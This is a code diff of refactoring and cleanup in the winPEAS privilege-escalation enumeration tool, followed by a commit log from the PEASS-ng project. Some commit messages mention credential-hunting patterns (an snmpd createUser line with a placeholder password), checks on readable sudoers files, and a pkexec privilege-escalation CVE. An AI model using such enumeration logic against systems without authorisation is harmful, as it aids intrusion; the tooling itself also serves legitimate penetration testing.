-			var user = string.IsNullOrEmpty(UserId) ? Properties.Resources.TriggerAnyUser : UserId;
+            var str = Resources.ResourceManager.GetString("TriggerSession" + StateChange.ToString());
+            var user = string.IsNullOrEmpty(UserId) ? Resources.TriggerAnyUser : UserId;
            if (StateChange != TaskSessionStateChangeType.SessionLock && StateChange != TaskSessionStateChangeType.SessionUnlock)
-				user = string.Format(Properties.Resources.TriggerSessionUserSession, user);
+                user = string.Format(Resources.TriggerSessionUserSession, user);
            return string.Format(str, user);
        }

@@ -1839,7 +1837,7 @@ namespace winPEAS.TaskScheduler

        /// <summary>Gets the non-localized trigger string for V2 triggers.</summary>
        /// <returns>String describing the trigger.</returns>
-		protected override string V2GetTriggerString() => string.Format(Properties.Resources.TriggerTime1, AdjustToLocal(StartBoundary));
+        protected override string V2GetTriggerString() => string.Format(Resources.TriggerTime1, AdjustToLocal(StartBoundary));
    }

    /// <summary>
@@ -1946,7 +1944,7 @@ namespace winPEAS.TaskScheduler
                if (v2Trigger != null)
                {
                    if (value <= StartBoundary)
-						throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
+                        throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
                    v2Trigger.EndBoundary = value == DateTime.MaxValue ? null : value.ToString(V2BoundaryDateFormat, DefaultDateCulture);
                }
                else
@@ -2063,7 +2061,7 @@ namespace winPEAS.TaskScheduler
                if (v2Trigger != null)
                {
                    if (value > EndBoundary)
-						throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
+                        throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
                    v2Trigger.StartBoundary = value == DateTime.MinValue ? null : value.ToString(V2BoundaryDateFormat, DefaultDateCulture);
                }
                else
@@ -2381,7 +2379,7 @@ namespace winPEAS.TaskScheduler
            v2Trigger = iTriggers.Create(ttype);
            Marshal.ReleaseComObject(iTriggers);
            if ((unboundValues.TryGetValue("StartBoundary", out var dt) ? (DateTime)dt : StartBoundary) > (unboundValues.TryGetValue("EndBoundary", out dt) ? (DateTime)dt : EndBoundary))
-				throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
+                throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
            foreach (var key in unboundValues.Keys)
            {
                try
@@ -2406,7 +2404,7 @@ namespace winPEAS.TaskScheduler
            if (v1TriggerData.MinutesInterval != 0 && v1TriggerData.MinutesInterval >= v1TriggerData.MinutesDuration)
                throw new ArgumentException("Trigger.Repetition.Interval must be less than Trigger.Repetition.Duration under Task Scheduler 1.0.");
            if (v1TriggerData.EndDate <= v1TriggerData.BeginDate)
-				throw new ArgumentException(Properties.Resources.Error_TriggerEndBeforeStart);
+                throw new ArgumentException(Resources.Error_TriggerEndBeforeStart);
            if (v1TriggerData.BeginDate == DateTime.MinValue)
                v1TriggerData.BeginDate = DateTime.Now;
            v1Trigger?.SetTrigger(ref v1TriggerData);
@@ -2456,13 +2454,13 @@ namespace winPEAS.TaskScheduler
            var ret = new StringBuilder();
            if (Repetition.Interval != TimeSpan.Zero)
            {
-				var sduration = Repetition.Duration == TimeSpan.Zero ? Properties.Resources.TriggerDuration0 : string.Format(Properties.Resources.TriggerDurationNot0, GetBestTimeSpanString(Repetition.Duration));
-				ret.AppendFormat(Properties.Resources.TriggerRepetition, GetBestTimeSpanString(Repetition.Interval), sduration);
+                var sduration = Repetition.Duration == TimeSpan.Zero ? Resources.TriggerDuration0 : string.Format(Resources.TriggerDurationNot0, GetBestTimeSpanString(Repetition.Duration));
+                ret.AppendFormat(Resources.TriggerRepetition, GetBestTimeSpanString(Repetition.Interval), sduration);
            }
            if (EndBoundary != DateTime.MaxValue)
-				ret.AppendFormat(Properties.Resources.TriggerEndBoundary, AdjustToLocal(EndBoundary));
+                ret.AppendFormat(Resources.TriggerEndBoundary, AdjustToLocal(EndBoundary));
            if (ret.Length > 0)
-				ret.Insert(0, Properties.Resources.HyphenSeparator);
+                ret.Insert(0, Resources.HyphenSeparator);
            return ret.ToString();
        }
    }
@@ -2609,7 +2607,7 @@ namespace winPEAS.TaskScheduler
        protected override string V2GetTriggerString()
        {
            var days = TaskEnumGlobalizer.GetString(DaysOfWeek);
-			return string.Format(WeeksInterval == 1 ? Properties.Resources.TriggerWeekly1Week : Properties.Resources.TriggerWeeklyMultWeeks, AdjustToLocal(StartBoundary), days, WeeksInterval);
+            return string.Format(WeeksInterval == 1 ? Resources.TriggerWeekly1Week : Resources.TriggerWeeklyMultWeeks, AdjustToLocal(StartBoundary), days, WeeksInterval);
        }

        /// <summary>Reads the subclass XML for V1 streams.</summary>
@@ -2775,8 +2773,8 @@ namespace winPEAS.TaskScheduler
            var rp = (RepetitionPattern)value;
            if (destinationType != typeof(string)) return base.ConvertTo(context, culture, value, destinationType);
            if (rp.Interval == TimeSpan.Zero) return "";
-			var sduration = rp.Duration == TimeSpan.Zero ? Properties.Resources.TriggerDuration0 : string.Format(Properties.Resources.TriggerDurationNot0Short, Trigger.GetBestTimeSpanString(rp.Duration));
-			return string.Format(Properties.Resources.TriggerRepetitionShort, Trigger.GetBestTimeSpanString(rp.Interval), sduration);
+            var sduration = rp.Duration == TimeSpan.Zero ? Resources.TriggerDuration0 : string.Format(Resources.TriggerDurationNot0Short, Trigger.GetBestTimeSpanString(rp.Duration));
+            return string.Format(Resources.TriggerRepetitionShort, Trigger.GetBestTimeSpanString(rp.Interval), sduration);
        }
    }
 }
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/TriggerCollection.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/TriggerCollection.cs
@@ -3,11 +3,8 @@ using System.Collections;
 using System.Collections.Generic;
 using System.Collections.Specialized;
 using System.ComponentModel;
-using System.Linq;
 using System.Runtime.CompilerServices;
 using System.Runtime.InteropServices;
-using System.Text;
-using System.Threading.Tasks;
 using System.Xml.Serialization;
 using winPEAS.TaskScheduler.TaskEditor.Native;
 using winPEAS.TaskScheduler.V1;
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/User.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/User.cs
@@ -1,9 +1,5 @@
 using System;
-using System.Collections.Generic;
-using System.Linq;
 using System.Security.Principal;
-using System.Text;
-using System.Threading.Tasks;
 using winPEAS.TaskScheduler.TaskEditor.Native;

 namespace winPEAS.TaskScheduler
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/Wildcard.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/Wildcard.cs
@@ -1,9 +1,4 @@
-using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
-using System.Text.RegularExpressions;
-using System.Threading.Tasks;
+using System.Text.RegularExpressions;

 namespace winPEAS.TaskScheduler
 {
@@ -30,12 +25,12 @@ namespace winPEAS.TaskScheduler
        /// <returns>A regular expression equivalent of the given wildcard.</returns>
        public static string WildcardToRegex([NotNull] string pattern)
        {
-			string s = Regex.Escape(pattern);
-			s = Regex.Replace(s, @"(?<!\\)\\\*", @".*"); // Negative Lookbehind
-			s = Regex.Replace(s, @"\\\\\\\*", @"\*");
-			s = Regex.Replace(s, @"(?<!\\)\\\?", @".");  // Negative Lookbehind
-			s = Regex.Replace(s, @"\\\\\\\?", @"\?");
-			return string.Concat("^", Regex.Replace(s, @"\\\\\\\\", @"\\"), "$");
+            string s = Escape(pattern);
+            s = Replace(s, @"(?<!\\)\\\*", @".*"); // Negative Lookbehind
+            s = Replace(s, @"\\\\\\\*", @"\*");
+            s = Replace(s, @"(?<!\\)\\\?", @".");  // Negative Lookbehind
+            s = Replace(s, @"\\\\\\\?", @"\?");
+            return string.Concat("^", Replace(s, @"\\\\\\\\", @"\\"), "$");
        }
    }
 }
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/WindowsImpersonatedIdentity.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/WindowsImpersonatedIdentity.cs
@@ -1,14 +1,9 @@
 using System;
-using System.Collections.Generic;
 using System.ComponentModel;
-using System.Linq;
 using System.Runtime.InteropServices;
 using System.Security.Principal;
-using System.Text;
-using System.Threading.Tasks;
 using winPEAS.Native;
 using winPEAS.Native.Classes;
-using winPEAS.TaskScheduler.TaskEditor.Native;

 namespace winPEAS.TaskScheduler
 {
--- a/winPEAS/winPEASexe/winPEAS/TaskScheduler/XmlSerializationHelper.cs
+++ b/winPEAS/winPEASexe/winPEAS/TaskScheduler/XmlSerializationHelper.cs
@@ -1,10 +1,8 @@
 using System;
 using System.Collections.Generic;
 using System.ComponentModel;
-using System.Linq;
 using System.Reflection;
 using System.Text;
-using System.Threading.Tasks;
 using System.Xml;
 using System.Xml.Serialization;

--- a/winPEAS/winPEASexe/winPEAS/Wifi/NativeWifiApi/Interop.cs
+++ b/winPEAS/winPEASexe/winPEAS/Wifi/NativeWifiApi/Interop.cs
@@ -1,7 +1,5 @@
-using System;
-using System.ComponentModel;
+using System.ComponentModel;
 using System.Diagnostics;
-using System.Runtime.InteropServices;

 namespace winPEAS.Wifi.NativeWifiApi
 {
Author	SHA1	Message	Date
Carlos Polop	8912bd2b9c	Update CI-master_tests.yml	2023-04-13 16:12:10 +02:00
carlospolop	438e00527d	Merge branch 'master' of https://github.com/carlospolop/PEASS-ng	2023-04-13 16:10:37 +02:00
carlospolop	144c0aef6f	push	2023-04-13 16:10:26 +02:00
Carlos Polop	c597da42f7	Merge pull request #348 from carlospolop/carlospolop-patch-1 Update CI-master_tests.yml	2023-04-13 15:47:15 +02:00
carlospolop	613bf14049	container	2023-04-13 15:44:57 +02:00
Carlos Polop	e1fdef50d9	Update CI-master_tests.yml	2023-04-13 15:44:42 +02:00
carlospolop	b1845a1a18	add sensitive files	2023-04-13 15:06:11 +02:00
carlospolop	19a2ed5f5a	linpeas improvements	2023-04-13 06:00:26 +02:00
Carlos Polop	1a7183decf	Merge pull request #346 from L1-0/patch-1 ColorLine Fix	2023-04-03 15:36:03 +02:00
Lino	8ee66af278	ColorLine Fix Added a trailing quotation on a ColorLine that could lead to an error. Spelling on :CurrentClipboard	2023-04-03 13:32:15 +02:00
Carlos Polop	0682cafe08	Update linpeas_base.sh	2023-03-29 17:23:14 +02:00
Carlos Polop	aa1f162359	Merge pull request #341 from ZoeS17/snmp sensitive_files.yaml(SNMP) add createUser to bad_regex	2023-03-29 17:17:28 +02:00
Carlos Polop	60b2e1d974	Merge pull request #340 from XHNan/patch-1 Fix a bug of finding readable files in sudoers.d	2023-03-29 17:16:34 +02:00
Zoe Kahala	eabec47c08	sensitive_files.yaml(SNMP) add createUser to bad_regex Add `createUser` to `bad_regex` as it likely contains a hardcoded password. As an example: ``` createUser bootstrap MD5 SuperSecurePassword123__ DES ``` where `SuperSecurePassword123__` is the password and `bootstrap` is the username, though I should mention the username maybe misleading here. Spec/Man-page link: [freebsd.org - snmpd.conf] [freebsd.org - snmpd.conf]: https://man.freebsd.org/cgi/man.cgi?query=snmpd.conf#:~:text=your%2D%0A%20%20%20%20%20%20%20self%20instead%3A-,createUser,-%5B%2De%09%20%20%20%20%20%20%20ENGINEID%5D%09%20%20%20%20%20%20username	2023-03-11 11:08:20 -06:00
KeoOp	7b9bf9cf91	Fix a bug of finding readable file in sudoers.d Fix a bug of finding user readable file in /etc/sudoers.d ``` for filename in /etc/sudoers.d/; do echo $filename # filename is a array done ``` ``` for filename in '/etc/sudoers.d/'; do echo $filename # filename is a single long string done ```	2023-03-08 16:37:32 +08:00
Carlos Polop	ded6f3045f	Merge pull request #329 from godylockz/master Fix Internet Explorer Enumeration	2022-12-31 18:37:08 +01:00
Carlos Polop	d20638fa7b	Merge pull request #331 from AlLongley/master Check "doas.conf" based on binary existence, not configuration files	2022-12-31 18:34:57 +01:00
Al Longley	aa69a494b4	Check "doas.conf" based on binary existence, not config	2022-12-31 18:43:14 +11:00
Carlos Polop	a4b226c16e	Update linpeas_base.sh	2022-12-31 00:58:00 +01:00
godylockz	3cc49b5b9a	Code Cleanup	2022-12-23 00:45:23 -05:00
godylockz	e5b9b67786	Fix IE Bug, Browser Consistency.	2022-12-23 00:45:05 -05:00
Carlos Polop	e29c9e88d5	Update CI-master_tests.yml	2022-12-21 15:32:55 +01:00
Carlos Polop	8b6ce759d0	Merge pull request #323 from ruppde/master Update 1_system_information.sh	2022-12-20 14:26:25 +01:00
Carlos Polop	116d842158	Merge pull request #326 from Riqky/master Update README.md to remove python2	2022-12-20 14:25:26 +01:00
Riqky	46033a7af0	Update README.md Update python webserver to python 3 command, since python 2 is EOL.	2022-12-20 13:46:59 +01:00
Arnim Rupp	0ab4a65bab	Update 1_system_information.sh Fix false positive, Ubuntu fixed it one day earlier: policykit-1 (0.105-20ubuntu0.18.04.6) bionic-security; urgency=medium * SECURITY UPDATE: Local Privilege Escalation in pkexec - debian/patches/CVE-2021-4034.patch: properly handle command-line arguments in src/programs/pkcheck.c, src/programs/pkexec.c. - CVE-2021-4034 -- Marc Deslauriers <email address hidden> Wed, 12 Jan 2022 07:34:00 -0500	2022-11-21 15:17:28 +01:00